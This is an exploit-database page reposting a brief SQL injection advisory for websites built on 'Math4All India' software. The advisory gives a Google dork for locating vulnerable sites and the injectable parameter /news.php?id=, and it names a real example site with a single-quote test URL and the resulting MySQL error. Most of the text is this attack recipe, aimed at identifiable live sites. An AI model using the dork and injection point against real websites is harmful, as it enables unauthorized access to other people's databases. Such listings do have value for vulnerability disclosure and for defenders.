Advertisement






© 2015 Math4All India All Rights Reserved SQL Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-09-06
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018090048

Below is a copy:

2015 Math4All India All Rights Reserved SQL Injection Vulnerability
#################################################################################################

# Exploit Title :  2015 Math4All India All Rights Reserved SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/09/2018
# Vendor Homepage : math4all.in
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork  : intext:'' 2015 Math4All. All Rights Reserved''

# Exploit : /news.php?id=[SQL Injection]

#################################################################################################

# Example Site => math4all.in/news.php?id=6%27 

# SQL Database Error => 

Database query failed You have an error in your SQL syntax; check the manual that corresponds 
to your MySQL server version for the right syntax to use near ''6''' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.